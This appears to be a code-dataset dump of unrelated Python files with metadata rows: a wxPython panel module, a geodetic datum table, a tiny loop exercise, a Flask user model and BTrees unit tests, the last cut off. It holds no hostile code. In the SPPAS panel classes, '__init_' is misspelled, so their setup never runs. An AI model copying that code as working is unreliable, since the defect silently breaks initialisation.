| 26.345794 | 94 | 0.588507 | 321 | 2,819 | 4.990654 | 0.208723 | 0.052434 | 0.049938 | 0.041199 | 0.129213 | 0.061798 | 0.061798 | 0.061798 | 0 | 0 | 0 | 0.004712 | 0.322455 | 2,819 | 106 | 95 | 26.59434 | 0.834031 | 0.176658 | 0 | 0.261538 | 0 | 0 | 0.032674 | 0.009664 | 0 | 0 | 0 | 0 | 0 | 1 | 0.215385 | false | 0 | 0.061538 | 0.061538 | 0.523077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
be329495ef12ddff3970143f48186f8fde800bac | 5,683 | py | Python | sppas/sppas/src/ui/phoenix/windows/panel.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | sppas/sppas/src/ui/phoenix/windows/panel.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | sppas/sppas/src/ui/phoenix/windows/panel.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
"""
..
---------------------------------------------------------------------
___ __ __ __ ___
/ | \ | \ | \ / the automatic
\__ |__/ |__/ |___| \__ annotation and
\ | | | | \ analysis
___/ | | | | ___/ of speech
http://www.sppas.org/
Use of this software is governed by the GNU Public License, version 3.
SPPAS is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
SPPAS is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with SPPAS. If not, see <http://www.gnu.org/licenses/>.
This banner notice must not be removed.
---------------------------------------------------------------------
src.ui.phoenix.windows.panel.py
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import wx
import wx.lib.scrolledpanel as sc
# ---------------------------------------------------------------------------
class sppasPanel(wx.Panel):
"""A panel is a window on which controls are placed.
:author: Brigitte Bigi
:organization: Laboratoire Parole et Langage, Aix-en-Provence, France
:contact: develop@sppas.org
:license: GPL, v3
:copyright: Copyright (C) 2011-2019 Brigitte Bigi
Possible constructors:
- sppasPanel()
- sppasPanel(parent, id=ID_ANY, pos=DefaultPosition, size=DefaultSize,
style=TAB_TRAVERSAL, name=PanelNameStr)
"""
def __init_(self, *args, **kw):
super(sppasPanel, self).__init__(*args, **kw)
s = wx.GetApp().settings
self.SetBackgroundColour(s.bg_color)
self.SetForegroundColour(s.fg_color)
self.SetFont(s.text_font)
self.SetAutoLayout(True)
self.SetMinSize(wx.Size(320, 200))
# -----------------------------------------------------------------------
def SetBackgroundColour(self, colour):
"""Override."""
wx.Panel.SetBackgroundColour(self, colour)
for c in self.GetChildren():
c.SetBackgroundColour(colour)
# -----------------------------------------------------------------------
def SetForegroundColour(self, colour):
"""Override."""
wx.Panel.SetForegroundColour(self, colour)
for c in self.GetChildren():
c.SetForegroundColour(colour)
# -----------------------------------------------------------------------
def SetFont(self, font):
"""Override."""
wx.Panel.SetFont(self, font)
for c in self.GetChildren():
c.SetFont(font)
self.Layout()
# -----------------------------------------------------------------------
@staticmethod
def fix_size(value):
"""Return a proportional size value.
:param value: (int)
:returns: (int)
"""
try:
obj_size = int(float(value) * wx.GetApp().settings.size_coeff)
except AttributeError:
obj_size = int(value)
return obj_size
# ---------------------------------------------------------------------------
class sppasScrolledPanel(sc.ScrolledPanel):
"""A panel is a window on which controls are placed.
:author: Brigitte Bigi
:organization: Laboratoire Parole et Langage, Aix-en-Provence, France
:contact: develop@sppas.org
:license: GPL, v3
:copyright: Copyright (C) 2011-2018 Brigitte Bigi
Possible constructors:
- sppasScrolledPanel()
- sppasScrolledPanel(parent, id=ID_ANY, pos=DefaultPosition,
size=DefaultSize, style=TAB_TRAVERSAL, name=PanelNameStr)
"""
def __init_(self, *args, **kw):
super(sppasScrolledPanel, self).__init__(*args, **kw)
s = wx.GetApp().settings
self.SetBackgroundColour(s.bg_color)
self.SetForegroundColour(s.fg_color)
self.SetFont(s.text_font)
# -----------------------------------------------------------------------
def SetBackgroundColour(self, colour):
"""Override."""
sc.ScrolledPanel.SetBackgroundColour(self, colour)
for c in self.GetChildren():
c.SetBackgroundColour(colour)
# -----------------------------------------------------------------------
def SetForegroundColour(self, colour):
"""Override."""
sc.ScrolledPanel.SetForegroundColour(self, colour)
for c in self.GetChildren():
c.SetForegroundColour(colour)
# -----------------------------------------------------------------------
def SetFont(self, font):
"""Override."""
sc.ScrolledPanel.SetFont(self, font)
for c in self.GetChildren():
c.SetFont(font)
self.Layout()
# -----------------------------------------------------------------------
@staticmethod
def fix_size(value):
"""Return a proportional size value.
:param value: (int)
:returns: (int)
"""
try:
obj_size = int(float(value) * wx.GetApp().settings.size_coeff)
except AttributeError:
obj_size = int(value)
return obj_size
| 32.107345 | 78 | 0.497273 | 514 | 5,683 | 5.375486 | 0.33463 | 0.028954 | 0.013029 | 0.021716 | 0.678972 | 0.624683 | 0.604415 | 0.604415 | 0.604415 | 0.604415 | 0 | 0.006433 | 0.261482 | 5,683 | 176 | 79 | 32.289773 | 0.651894 | 0.541791 | 0 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.172414 | false | 0.034483 | 0.034483 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
be4442d1df9dbd7d8be27b38766a39255db10dfb | 11,102 | py | Python | Tectonic_Utils/geodesy/datums.py | kmaterna/Utility_Code | 9894c831a4b2b6c4e4bdb577ad64492d8cd5bd17 | [
"MIT"
] | null | null | null | Tectonic_Utils/geodesy/datums.py | kmaterna/Utility_Code | 9894c831a4b2b6c4e4bdb577ad64492d8cd5bd17 | [
"MIT"
] | null | null | null | Tectonic_Utils/geodesy/datums.py | kmaterna/Utility_Code | 9894c831a4b2b6c4e4bdb577ad64492d8cd5bd17 | [
"MIT"
] | null | null | null | """
Convert between local enu, local llh, and global xyz coordinates
Translated from the Matlab toolkit of P. Segall and lab.
"""
import numpy as np
# Datum list --------------------------------------------------------------------
data = {
'ABINDAN ': [-1.121450e+002, -5.475071e-005, -162, -12, 206],
'AFGOOYE ': [-1.080000e+002, 4.807955e-007, -43, -163, 45],
'AIN EL ABD 1970 ': [-2.510000e+002, -1.419270e-005, -150, -251, -2],
'ANNA 1 ASTRO 1965 ': [-2.300000e+001, -8.120449e-008, -491, -22, 435],
'ARC 1950 ': [-1.121450e+002, -5.475071e-005, -143, -90, -294],
'ARC 1960 ': [-1.121450e+002, -5.475071e-005, -160, -8, -300],
'ASCENSION ISLAND 1958': [-2.510000e+002, -1.419270e-005, -207, 107, 52],
'ASTRO B4 SOROL ATOLL ': [-2.510000e+002, -1.419270e-005, 114, -116, -333],
'ASTRO BEACON "E" ': [-2.510000e+002, -1.419270e-005, 145, 75, -272],
'ASTRO DOS 71/4 ': [-2.510000e+002, -1.419270e-005, -320, 550, -494],
'ASTRONOMIC STN 1952 ': [-2.510000e+002, -1.419270e-005, 124, -234, -25],
'AUSTRALIAN GEOD 1966 ': [-2.300000e+001, -8.120449e-008, -133, -48, 148],
'AUSTRALIAN GEOD 1984 ': [-2.300000e+001, -8.120449e-008, -134, -48, 149],
'BD 72 ': [-2.510000e+002, -1.419270e-005, -126, 80, -101],
'BELLEVUE (IGN) ': [-2.510000e+002, -1.419270e-005, -127, -769, 472],
'BERMUDA 1957 ': [-6.940000e+001, -3.726464e-005, -73, 213, 296],
'BOGOTA OBSRVATRY ': [-2.510000e+002, -1.419270e-005, 307, 304, -318],
'CAMPO INCHAUSPE ': [-2.510000e+002, -1.419270e-005, -148, 136, 90],
'CANTON ASTRO 1966 ': [-2.510000e+002, -1.419270e-005, 298, -304, -375],
'CAPE ': [-1.121450e+002, -5.475071e-005, -136, -108, -292],
'CAPE CANAVERAL ': [-6.940000e+001, -3.726464e-005, -2, 150, 181],
'CARTHAGE ': [-1.121450e+002, -5.475071e-005, -263, 6, 431],
'CH-1903 ': [07.398450e+002, 1.003748e-005, 674, 15, 405],
'CHATHAM 1971 ': [-2.510000e+002, -1.419270e-005, 175, -38, 113],
'CHUA ASTRO ': [-2.510000e+002, -1.419270e-005, -134, 229, -29],
'CORREGO ALEGRE ': [-2.510000e+002, -1.419270e-005, -206, 172, -6],
'DJAKARTA (BATAVIA) ': [07.398450e+002, 1.003748e-005, -377, 681, -50],
'DOS 1968 ': [-2.510000e+002, -1.419270e-005, 230, -199, -752],
'EASTER ISLAND 1967 ': [-2.510000e+002, -1.419270e-005, 211, 147, 111],
'EUROPEAN 1950 ': [-2.510000e+002, -1.419270e-005, -87, -98, -121],
'EUROPEAN 1979 ': [-2.510000e+002, -1.419270e-005, -86, -98, -119],
'FINLAND HAYFORD ': [-2.510000e+002, -1.419270e-005, -78, -231, -97],
'GANDAJIKA BASE ': [-2.510000e+002, -1.419270e-005, -133, -321, 50],
'GEODETIC DATUM 1949 ': [-2.510000e+002, -1.419270e-005, 84, -22, 209],
'GUAM 1963 ': [-6.940000e+001, -3.726464e-005, -100, -248, 259],
'GUX 1 ASTRO ': [-2.510000e+002, -1.419270e-005, 252, -209, -751],
'HJORSEY 1955 ': [-2.510000e+002, -1.419270e-005, -73, 46, -86],
'HONG KONG 1963 ': [-2.510000e+002, -1.419270e-005, -156, -271, -189],
'HU-TZU-SHAN ': [-2.510000e+002, -1.419270e-005, -637, -549, -203],
'INDIAN BANGLADESH ': [08.606550e+002, 2.836137e-005, 289, 734, 257],
'INDIAN THAILAND ': [08.606550e+002, 2.836137e-005, 214, 836, 303],
'IRELAND 1965 ': [07.968110e+002, 1.196002e-005, 506, -122, 611],
'ISRAEL ': [-1.637890e+002, -5.473908e-005, -235, -85, 264],
'ISTS 073 ASTRO 1969 ': [-2.510000e+002, -1.419270e-005, 208, -435, -229],
'JOHNSTON ISLAND ': [-2.510000e+002, -1.419270e-005, 191, -77, -204],
'KANDAWALA ': [08.606550e+002, 2.836137e-005, -97, 787, 86],
'KERGUELEN ISLAND ': [-2.510000e+002, -1.419270e-005, 145, -187, 103],
'KERTAU 1948 ': [08.329370e+002, 2.836137e-005, -11, 851, 5],
'L.C. 5 ASTRO ': [-6.940000e+001, -3.726464e-005, 42, 124, 147],
'LIBERIA 1964 ': [-1.121450e+002, -5.475071e-005, -90, 40, 88],
'LUZON MINDANAO ': [-6.940000e+001, -3.726464e-005, -133, -79, -72],
'LUZON PHILIPPINES ': [-6.940000e+001, -3.726464e-005, -133, -77, -51],
'MAHE 1971 ': [-1.121450e+002, -5.475071e-005, 41, -220, -134],
'MARCO ASTRO ': [-2.510000e+002, -1.419270e-005, -289, -124, 60],
'MASSAWA ': [07.398450e+002, 1.003748e-005, 639, 405, 60],
'MERCHICH ': [-1.121450e+002, -5.475071e-005, 31, 146, 47],
'MICHELIN ': [01.614000e+003, 1.127918e-004, 1118, 23, 66],
'MIDWAY ASTRO 1961 ': [-2.510000e+002, -1.419270e-005, 912, -58, 1227],
'MINNA ': [-1.121450e+002, -5.475071e-005, -92, -93, 122],
'NAD27 ALASKA ': [-6.940000e+001, -3.726464e-005, -5, 135, 172],
'NAD27 BAHAMAS ': [-6.940000e+001, -3.726464e-005, -4, 154, 178],
'NAD27 CANADA ': [-6.940000e+001, -3.726464e-005, -10, 158, 187],
'NAD27 CANAL ZONE ': [-6.940000e+001, -3.726464e-005, 0, 125, 201],
'NAD27 CARIBBEAN ': [-6.940000e+001, -3.726464e-005, -7, 152, 178],
'NAD27 CENTRAL ': [-6.940000e+001, -3.726464e-005, 0, 125, 194],
'NAD27 CONUS ': [-6.940000e+001, -3.726464e-005, -8, 160, 176],
'NAD27 CUBA ': [-6.940000e+001, -3.726464e-005, -9, 152, 178],
'NAD27 GREENLAND ': [-6.940000e+001, -3.726464e-005, 11, 114, 195],
'NAD27 MEXICO ': [-6.940000e+001, -3.726464e-005, -12, 130, 190],
'NAD27 SAN SALVADOR ': [-6.940000e+001, -3.726464e-005, 1, 140, 165],
'NAD83 ': [00.000000e+000, -1.643484e-011, 0, 0, 0],
'NAHRWN MASIRAH ILND ': [-1.121450e+002, -5.475071e-005, -247, -148, 369],
'NAHRWN SAUDI ARABIA ': [-1.121450e+002, -5.575071e-005, -231, -196, 482],
'NAHRWN UNITED ARAB ': [-1.121450e+002, -5.475071e-005, -249, -156, 381],
'NAPARIMA BWI ': [-2.510000e+002, -1.419270e-005, -2, 374, 172],
'NETHERLANDS ': [07.400000e+002, 1.003748e-005, 593, 26, 478],
'OBSERVATORIO 1966 ': [-2.510000e+002, -1.419270e-005, -425, -169, 81],
'OLD EGYPTIAN ': [-6.300000e+001, 4.807955e-007, -130, 110, -13],
'OLD HAWAIIAN ': [-6.940000e+001, -3.726464e-005, 61, -285, -181],
'OMAN ': [-1.121450e+002, -5.475071e-005, -346, -1, 224],
'ORD SRVY GRT BRITN ': [05.736040e+002, 1.196002e-005, 375, -111, 431],
'PICO DE LAS NIEVES ': [-2.510000e+002, -1.419270e-005, -307, -92, 127],
'PITCAIRN ASTRO 1967 ': [-2.510000e+002, -1.419270e-005, 185, 165, 42],
'POTSDAM ': [07.398000e+002, 1.003748e-005, 587, 16, 393],
'PROV SO AMRICN 1956 ': [-2.510000e+002, -1.419270e-005, -288, 175, -376],
'PROV SO CHILEAN 1963 ': [-2.510000e+002, -1.419270e-005, 16, 196, 93],
'PUERTO RICO ': [-6.940000e+001, -3.726464e-005, 11, 72, -101],
'QATAR NATIONAL ': [-2.510000e+002, -1.419270e-005, -128, -283, 22],
'QORNOQ ': [-2.510000e+002, -1.419270e-005, 164, 138, -189],
'REUNION ': [-2.510000e+002, -1.419270e-005, 94, -948, -1262],
'ROME 1940 ': [-2.510000e+002, -1.419270e-005, -225, -65, 9],
'RT 90 ': [07.398450e+002, 1.003748e-005, 498, -36, 568],
'S-42 ': [-1.080000e+002, 4.807600e-007, 23, -124, -84],
'SANTO (DOS) ': [-2.510000e+002, -1.419270e-005, 170, 42, 84],
'SAO BRAZ ': [-2.510000e+002, -1.419270e-005, -203, 141, 53],
'SAPPER HILL 1943 ': [-2.510000e+002, -1.419270e-005, -355, 16, 74],
'SCHWARZECK ': [06.531350e+002, 1.003748e-005, 616, 97, -251],
'SOUTH AMERICAN 1969 ': [-2.300000e+001, -8.120449e-008, -57, 1, -41],
'SOUTH ASIA ': [-1.800000e+001, 4.807955e-007, 7, -10, -26],
'SOUTHEAST BASE ': [-2.510000e+002, -1.419270e-005, -499, -249, 314],
'SOUTHWEST BASE ': [-2.510000e+002, -1.419270e-005, -104, 167, -38],
'TIMBALAI 1948 ': [08.606550e+002, 2.836137e-005, -689, 691, -46],
'TOKYO ': [07.398450e+002, 1.003748e-005, -128, 481, 664],
'TRISTAN ASTRO 1968 ': [-2.510000e+002, -1.419270e-005, -632, 438, -609],
'VITI LEVU 1916 ': [-1.121450e+002, -5.475071e-005, 51, 391, -36],
'WAKE-ENIWETOK 1960 ': [-1.330000e+002, -1.419270e-005, 101, 52, -39],
'WGS 72 ': [02.000000e+000, 3.121058e-008, 0, 0, 5],
'WGS 84 ': [00.000000e+000, 0.000000e+000, 0, 0, 0],
'ZANDERIJ ': [-2.510000e+002, -1.419270e-005, -265, 120, -358]
};
def get_datums(names=None):
"""
Returns da, df, dX, dY, dZ given a specific datum.
DATUMVALUE=data(DATUMNAMES) returns the datum parameters for datum specified by string array DATUMNAMES.
These parameters are defined as differences to the WGS-84 ellipsoid:
* da = WGS-84 equatorial radius minus the specified datum equatorial radius (meters)
* df = WGS-84 flattening minus the specified datum flattening
* dX = X-coordinate of WGS-84 geocenter minus the specified datum X-coordinate (meters)
* dY = Y-coordinate of WGS-84 geocenter minus the specified datum Y-coordinate (meters)
* dZ = Z-coordinate of WGS-84 geocenter minus the specified datum Z-coordinate (meters)
For reference:
* WGS-84 Equatorial Radius (a) = 6378137.0
* WGS-84 Flattening (f) = 1/298.257223563
Calling the function without input arguments returns a list of available datums.
Unmatched datums return NaNs.
:param names: string
:type names: string
:returns: 5 numbers representing the chosen datum relative to WGS-84
:rtype: array
"""
if not names: # Return list of available datums if called with no input arguments.
return data.keys();
# Read the database. Match requested datums with those available.
all_keys = data.keys(); # collect keys
value = np.zeros((len(names), 5)); # initialize return vaule
for i in range(len(names)):
modified_name = "{:<21}".format(names[i].upper());
if modified_name in all_keys:
value[i, :] = data[modified_name];
else:
value[i, :] = [np.nan, np.nan, np.nan, np.nan, np.nan];
return value;
| 70.265823 | 108 | 0.517925 | 1,484 | 11,102 | 3.87062 | 0.377358 | 0.04039 | 0.091922 | 0.116992 | 0.40094 | 0.40094 | 0.142758 | 0.038475 | 0.02507 | 0 | 0 | 0.416645 | 0.2922 | 11,102 | 157 | 109 | 70.713376 | 0.314329 | 0.123581 | 0 | 0 | 0 | 0 | 0.238095 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008065 | false | 0 | 0.008065 | 0 | 0.032258 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
be5ec38c34aa73ab5369cd4d0f1dadcf1448818f | 97 | py | Python | cap5/c5e5.2.py | JoseArtur/phyton-exercices | f3da4447044e445222233960f991fb2e36311131 | [
"MIT"
] | null | null | null | cap5/c5e5.2.py | JoseArtur/phyton-exercices | f3da4447044e445222233960f991fb2e36311131 | [
"MIT"
] | null | null | null | cap5/c5e5.2.py | JoseArtur/phyton-exercices | f3da4447044e445222233960f991fb2e36311131 | [
"MIT"
] | null | null | null | # Modify the program to show the numbers from 50 to 100
x=50
while x<=100:
print(x)
x=x+1 | 19.4 | 55 | 0.659794 | 21 | 97 | 3.047619 | 0.619048 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150685 | 0.247423 | 97 | 5 | 56 | 19.4 | 0.726027 | 0.546392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
be61238f1e4abf6a51ca12711882e7aaeb72572a | 2,672 | py | Python | api/app/users/models.py | Jean-Lytehouse/Lytehouse-Autocam | 74df801a652325be86e52e337c0f9471694da02a | [
"Apache-2.0"
] | null | null | null | api/app/users/models.py | Jean-Lytehouse/Lytehouse-Autocam | 74df801a652325be86e52e337c0f9471694da02a | [
"Apache-2.0"
] | null | null | null | api/app/users/models.py | Jean-Lytehouse/Lytehouse-Autocam | 74df801a652325be86e52e337c0f9471694da02a | [
"Apache-2.0"
] | null | null | null | from datetime import datetime, timedelta
from app import db, bcrypt, LOGGER
from app.utils.misc import make_code
from flask_login import UserMixin
def expiration_date():
return datetime.now() + timedelta(days=1)
class AppUser(db.Model, UserMixin):
id = db.Column(db.Integer(), primary_key=True)
email = db.Column(db.String(255), unique=True, nullable=False)
firstname = db.Column(db.String(100), nullable=False)
lastname = db.Column(db.String(100), nullable=False)
camera1Ip = db.Column(db.String(100), nullable=False)
camera1Name = db.Column(db.String(100), nullable=False)
camera2Ip = db.Column(db.String(100), nullable=False)
camera2Name = db.Column(db.String(100), nullable=False)
camera3Ip = db.Column(db.String(100), nullable=False)
camera3Name = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(255), nullable=False)
verified_email = db.Column(db.Boolean(), nullable=True)
verify_token = db.Column(db.String(255), nullable=True, unique=True, default=make_code)
def __init__(self,
email,
firstname,
lastname,
camera1Ip,
camera1Name,
camera2Ip,
camera2Name,
camera3Ip,
camera3Name,
password):
self.email = email
self.firstname = firstname
self.lastname = lastname
self.camera1Ip = camera1Ip
self.camera1Name = camera1Name
self.camera2Ip = camera2Ip
self.camera2Name = camera2Name
self.camera3Ip = camera3Ip
self.camera3Name = camera3Name
self.set_password(password)
self.verified_email = True
def set_password(self, password):
self.password = bcrypt.generate_password_hash(password)
def deactivate(self):
self.active = False
def verify(self):
self.verified_email = True
def update_email(self, new_email):
self.verified_email = False
self.verify_token = make_code()
self.email = new_email
def delete(self):
self.is_deleted = True
self.deleted_datetime_utc = datetime.now()
class PasswordReset(db.Model):
id = db.Column(db.Integer(), primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('app_user.id'))
code = db.Column(db.String(255), unique=True, default=make_code)
date = db.Column(db.DateTime(), default=expiration_date)
user = db.relationship(AppUser)
db.UniqueConstraint('user_id', 'code', name='uni_user_code')
def __init__(self, user):
self.user = user
| 32.192771 | 91 | 0.643338 | 316 | 2,672 | 5.31962 | 0.227848 | 0.080904 | 0.10113 | 0.114218 | 0.321832 | 0.25818 | 0.226056 | 0.039262 | 0 | 0 | 0 | 0.030378 | 0.248503 | 2,672 | 82 | 92 | 32.585366 | 0.806773 | 0 | 0 | 0.0625 | 0 | 0 | 0.013099 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.09375 | 0.0625 | 0.015625 | 0.515625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
be6b52a80614ef7b9327ded1a3d1a10e350ccd3c | 10,641 | py | Python | eggs/BTrees-4.1.1-py2.7-linux-x86_64.egg/BTrees/tests/test_IFBTree.py | salayhin/talkofacta | 8b5a14245dd467bb1fda75423074c4840bd69fb7 | [
"MIT"
] | 2 | 2020-05-16T08:38:34.000Z | 2020-10-01T01:32:57.000Z | eggs/BTrees-4.1.1-py2.7-linux-x86_64.egg/BTrees/tests/test_IFBTree.py | salayhin/talkofacta | 8b5a14245dd467bb1fda75423074c4840bd69fb7 | [
"MIT"
] | 1 | 2021-03-25T21:51:01.000Z | 2021-03-25T21:51:01.000Z | eggs/BTrees-4.1.1-py2.7-linux-x86_64.egg/BTrees/tests/test_IFBTree.py | salayhin/talkofacta | 8b5a14245dd467bb1fda75423074c4840bd69fb7 | [
"MIT"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2001-2012 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
import unittest
from .common import BTreeTests
from .common import ExtendedSetTests
from .common import InternalKeysMappingTest
from .common import InternalKeysSetTest
from .common import MappingBase
from .common import MappingConflictTestBase
from .common import ModuleTest
from .common import MultiUnion
from .common import NormalSetTests
from .common import SetConflictTestBase
from .common import SetResult
from .common import TestLongIntKeys
from .common import makeBuilder
from BTrees.IIBTree import using64bits #XXX Ugly, but unavoidable
class IFBTreeInternalKeyTest(InternalKeysMappingTest, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFBTree
return IFBTree
class IFBTreePyInternalKeyTest(InternalKeysMappingTest, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFBTreePy
return IFBTreePy
class IFTreeSetInternalKeyTest(InternalKeysSetTest, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFTreeSet
return IFTreeSet
class IFTreeSetPyInternalKeyTest(InternalKeysSetTest, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFTreeSetPy
return IFTreeSetPy
class IFBucketTest(MappingBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFBucket
return IFBucket
class IFBucketPyTest(MappingBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFBucketPy
return IFBucketPy
class IFTreeSetTest(NormalSetTests, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFTreeSet
return IFTreeSet
class IFTreeSetPyTest(NormalSetTests, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFTreeSetPy
return IFTreeSetPy
class IFSetTest(ExtendedSetTests, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFSet
return IFSet
class IFSetPyTest(ExtendedSetTests, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFSetPy
return IFSetPy
class IFBTreeTest(BTreeTests, unittest.TestCase):
def _makeOne(self):
from BTrees.IFBTree import IFBTree
return IFBTree()
class IFBTreePyTest(BTreeTests, unittest.TestCase):
def _makeOne(self):
from BTrees.IFBTree import IFBTreePy
return IFBTreePy()
if using64bits:
class IFBTreeTest(BTreeTests, TestLongIntKeys, unittest.TestCase):
def _makeOne(self):
from BTrees.IFBTree import IFBTree
return IFBTree()
def getTwoValues(self):
return 0.5, 1.5
class IFBTreePyTest(BTreeTests, TestLongIntKeys, unittest.TestCase):
def _makeOne(self):
from BTrees.IFBTree import IFBTreePy
return IFBTreePy()
def getTwoValues(self):
return 0.5, 1.5
class _TestIFBTreesBase(object):
def testNonIntegerKeyRaises(self):
self.assertRaises(TypeError, self._stringraiseskey)
self.assertRaises(TypeError, self._floatraiseskey)
self.assertRaises(TypeError, self._noneraiseskey)
def testNonNumericValueRaises(self):
self.assertRaises(TypeError, self._stringraisesvalue)
self.assertRaises(TypeError, self._noneraisesvalue)
self._makeOne()[1] = 1
self._makeOne()[1] = 1.0
def _stringraiseskey(self):
self._makeOne()['c'] = 1
def _floatraiseskey(self):
self._makeOne()[2.5] = 1
def _noneraiseskey(self):
self._makeOne()[None] = 1
def _stringraisesvalue(self):
self._makeOne()[1] = 'c'
def _floatraisesvalue(self):
self._makeOne()[1] = 1.4
def _noneraisesvalue(self):
self._makeOne()[1] = None
class TestIFBTrees(_TestIFBTreesBase, unittest.TestCase):
def _makeOne(self):
from BTrees.IFBTree import IFBTree
return IFBTree()
class TestIFBTreesPy(_TestIFBTreesBase, unittest.TestCase):
def _makeOne(self):
from BTrees.IFBTree import IFBTreePy
return IFBTreePy()
class TestIFMultiUnion(MultiUnion, unittest.TestCase):
def multiunion(self, *args):
from BTrees.IFBTree import multiunion
return multiunion(*args)
def union(self, *args):
from BTrees.IFBTree import union
return union(*args)
def mkset(self, *args):
from BTrees.IFBTree import IFSet as mkset
return mkset(*args)
def mktreeset(self, *args):
from BTrees.IFBTree import IFTreeSet as mktreeset
return mktreeset(*args)
def mkbucket(self, *args):
from BTrees.IFBTree import IFBucket as mkbucket
return mkbucket(*args)
def mkbtree(self, *args):
from BTrees.IFBTree import IFBTree as mkbtree
return mkbtree(*args)
class TestIFMultiUnionPy(MultiUnion, unittest.TestCase):
def multiunion(self, *args):
from BTrees.IFBTree import multiunionPy
return multiunionPy(*args)
def union(self, *args):
from BTrees.IFBTree import unionPy
return unionPy(*args)
def mkset(self, *args):
from BTrees.IFBTree import IFSetPy as mkset
return mkset(*args)
def mktreeset(self, *args):
from BTrees.IFBTree import IFTreeSetPy as mktreeset
return mktreeset(*args)
def mkbucket(self, *args):
from BTrees.IFBTree import IFBucketPy as mkbucket
return mkbucket(*args)
def mkbtree(self, *args):
from BTrees.IFBTree import IFBTreePy as mkbtree
return mkbtree(*args)
class PureIF(SetResult, unittest.TestCase):
def union(self, *args):
from BTrees.IFBTree import union
return union(*args)
def intersection(self, *args):
from BTrees.IFBTree import intersection
return intersection(*args)
def difference(self, *args):
from BTrees.IFBTree import difference
return difference(*args)
def builders(self):
from BTrees.IFBTree import IFBTree
from BTrees.IFBTree import IFBucket
from BTrees.IFBTree import IFTreeSet
from BTrees.IFBTree import IFSet
return IFSet, IFTreeSet, makeBuilder(IFBTree), makeBuilder(IFBucket)
class PureIFPy(SetResult, unittest.TestCase):
def union(self, *args):
from BTrees.IFBTree import unionPy
return unionPy(*args)
def intersection(self, *args):
from BTrees.IFBTree import intersectionPy
return intersectionPy(*args)
def difference(self, *args):
from BTrees.IFBTree import differencePy
return differencePy(*args)
def builders(self):
from BTrees.IFBTree import IFBTreePy
from BTrees.IFBTree import IFBucketPy
from BTrees.IFBTree import IFTreeSetPy
from BTrees.IFBTree import IFSetPy
return (IFSetPy, IFTreeSetPy,
makeBuilder(IFBTreePy), makeBuilder(IFBucketPy))
class IFBTreeConflictTests(MappingConflictTestBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFBTree
return IFBTree
